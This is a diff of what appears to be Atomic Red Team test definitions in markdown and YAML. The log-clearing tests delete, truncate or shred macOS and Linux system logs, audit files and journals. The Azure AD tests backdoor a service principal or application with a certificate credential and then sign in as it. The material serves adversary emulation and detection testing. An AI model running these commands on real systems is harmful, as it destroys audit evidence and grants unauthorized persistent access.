sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
```
##### Get Prereq Commands:
```sh
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
```
<br/>
@@ -94,7 +113,6 @@ This test deletes main log datastore, inflight log data, time-to-live data(TTL),
```sh
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
```
@@ -117,18 +135,35 @@ This test truncates the system log files using the truncate utility with (-s 0 o
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path of system log to delete. | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo truncate -s 0 /var/log/system.log #size parameter shorthand
sudo truncate --size=0 /var/log/system.log #size parameter
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
sudo truncate --size=0 #{system_log_path} #size parameter
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path}
```
##### Get Prereq Commands:
```sh
touch #{system_log_path}
```
<br/>
@@ -146,18 +181,35 @@ The first sub-test truncates the log file to zero bytes via /dev/null and the se
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path of system log to delete. | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path}
```
##### Get Prereq Commands:
```sh
touch #{system_log_path}
```
<br/>
@@ -175,19 +227,38 @@ This test finds and deletes the system log files within /var/log/ directory usin
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_name1 | name or prefix of system log to delete. | string | system.log|
| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz|
| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
```
##### Get Prereq Commands:
```sh
touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
```
<br/>
@@ -205,12 +276,17 @@ This test overwrites the contents of system log file with an empty string using
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo echo '' > /var/log/system.log
sudo echo '' > #{system_log_path}
```
@@ -261,17 +337,34 @@ This test deletes the system log file using unlink utility
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo unlink /var/log/system.log
sudo unlink #{system_log_path}
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path}
```
##### Get Prereq Commands:
```sh
touch #{system_log_path}
```
<br/>
@@ -289,17 +382,34 @@ This test overwrites the contents of the log file with zero bytes(-z) using thre
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo shred -u -z -n 3 /var/log/system.log
sudo shred -u -z -n 3 #{system_log_path}
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path}
```
##### Get Prereq Commands:
```sh
touch #{system_log_path}
```
<br/>
@@ -319,18 +429,36 @@ Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
| system_log_folder | path to log parent folder | string | /var/log/|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo srm /var/log/system.log #system log file deletion
sudo srm -r /var/log/ #recursive deletion of log files
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path} #{system_log_folder}
```
##### Get Prereq Commands:
```sh
mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
```
<br/>
@@ -348,17 +476,34 @@ This test deletes the system log file using osascript via "do shell script"(sh/b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path}
```
##### Get Prereq Commands:
```sh
touch #{system_log_path}
```
<br/>
@@ -378,17 +523,34 @@ Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{system_log_path}
```
##### Get Prereq Commands:
```sh
touch #{system_log_path}
```
<br/>
@@ -406,18 +568,35 @@ The first sub-test deletes the journal files using rm utility in the "/var/log/j
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| journal_folder | path to journal logs | string | /var/log/journal|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat #{journal_folder}
```
##### Get Prereq Commands:
```sh
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
```
<br/>
@@ -441,7 +620,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
| username | Username of mail spool | string | root|
#### Attack Commands: Run with `bash`!
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
@@ -451,6 +630,18 @@ echo 0> /var/spool/mail/#{username}
#### Dependencies: Run with `sh`!
##### Description: target files must exist
##### Check Prereq Commands:
```sh
stat /var/spool/mail/#{username}
```
##### Get Prereq Commands:
```sh
touch /var/spool/mail/#{username}
```
<br/>
@@ -474,13 +665,17 @@ This test overwrites the specified log. This technique was used by threat actor
| log_path | Path of specified log | path | /var/log/secure|
#### Attack Commands: Run with `bash`!
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo 0> #{log_path}
```
#### Cleanup Commands:
```bash
if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
```
atomics/T1070.002/T1070.002.yaml
+181 -18
View File
@@ -8,10 +8,28 @@ atomic_tests:
supported_platforms:
- macos
- linux
input_arguments:
syslog_path:
description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/.
type: string
default: /var/log/system.log
macos_audit_path:
description: path of audit file to delete
type: string
default: /var/audit/20220725213300.202208110700021
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
get_prereq_command: |
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -24,7 +42,6 @@ atomic_tests:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -33,10 +50,23 @@ atomic_tests:
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: /var/log/system.log
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path}
get_prereq_command: |
touch #{system_log_path}
executor:
command: |
sudo truncate -s 0 /var/log/system.log #size parameter shorthand
sudo truncate --size=0 /var/log/system.log #size parameter
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
sudo truncate --size=0 #{system_log_path} #size parameter
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -45,10 +75,23 @@ atomic_tests:
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: /var/log/system.log
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path}
get_prereq_command: |
touch #{system_log_path}
executor:
command: |
sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -57,11 +100,32 @@ atomic_tests:
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
supported_platforms:
- macos
input_arguments:
system_log_name1:
description: name or prefix of system log to delete.
type: string
default: system.log
system_log_name2:
description: name or prefix of system log to delete.
type: string
default: system.log.97.gz
system_log_name3:
description: name or prefix of system log to delete.
type: string
default: system.log.98.gz
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
get_prereq_command: |
touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
executor:
command: |
sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -70,9 +134,14 @@ atomic_tests:
This test overwrites the contents of system log file with an empty string using echo utility
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: /var/log/system.log
executor:
command: |
sudo echo '' > /var/log/system.log
sudo echo '' > #{system_log_path}
name: sh
elevation_required: true
- name: Real-time system log clearance/deletion
@@ -92,9 +161,22 @@ atomic_tests:
This test deletes the system log file using unlink utility
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: /var/log/system.log
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path}
get_prereq_command: |
touch #{system_log_path}
executor:
command: |
sudo unlink /var/log/system.log
sudo unlink #{system_log_path}
name: sh
elevation_required: true
- name: Delete system log files using shred utility
@@ -103,9 +185,22 @@ atomic_tests:
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: /var/log/system.log
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path}
get_prereq_command: |
touch #{system_log_path}
executor:
command: |
sudo shred -u -z -n 3 /var/log/system.log
sudo shred -u -z -n 3 #{system_log_path}
name: sh
elevation_required: true
- name: Delete system log files using srm utility
@@ -116,10 +211,27 @@ atomic_tests:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: /var/log/system.log
system_log_folder:
description: path to log parent folder
type: string
default: /var/log/
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path} #{system_log_folder}
get_prereq_command: |
mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
executor:
command: |
sudo srm /var/log/system.log #system log file deletion
sudo srm -r /var/log/ #recursive deletion of log files
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -128,9 +240,22 @@ atomic_tests:
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: /var/log/system.log
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path}
get_prereq_command: |
touch #{system_log_path}
executor:
command: |
osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
name: sh
elevation_required: true
- name: Delete system log files using Applescript
@@ -141,9 +266,22 @@ atomic_tests:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: /var/log/system.log
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{system_log_path}
get_prereq_command: |
touch #{system_log_path}
executor:
command: |
osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
@@ -152,9 +290,22 @@ atomic_tests:
The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
supported_platforms:
- linux
input_arguments:
journal_folder:
description: path to journal logs
type: string
default: /var/log/journal
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat #{journal_folder}
get_prereq_command: |
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
executor:
command: |
sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -169,7 +320,16 @@ atomic_tests:
description: Username of mail spool
type: string
default: root
dependency_executor_name: sh
dependencies:
- description: |
target files must exist
prereq_command: |
stat /var/spool/mail/#{username}
get_prereq_command: |
touch /var/spool/mail/#{username}
executor:
elevation_required: true
command: |
echo 0> /var/spool/mail/#{username}
name: bash
@@ -188,3 +348,6 @@ atomic_tests:
command: |
echo 0> #{log_path}
name: bash
elevation_required: true
cleanup_command: |
if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
atomics/T1098.001/T1098.001.md
+8 -20
View File
@@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| service_principal_name | Name of the targeted service principal | string | SuperSP|
| certificate_password | Password of the new certificate | string | Passw0rd|
| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -94,7 +89,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
```
@@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| application_name | Name of the targeted application | string | SuperApp|
| certificate_password | Password of the new certificate | string | Passw0rd|
| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -188,7 +177,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
```
atomics/T1098.001/T1098.001.yaml
+8 -32
View File
@@ -22,14 +22,6 @@ atomic_tests:
description: Name of the targeted service principal
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -49,21 +41,18 @@ atomic_tests:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
@@ -82,7 +71,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
@@ -107,14 +95,6 @@ atomic_tests:
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -134,21 +114,18 @@ atomic_tests:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: |
@@ -166,7 +143,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key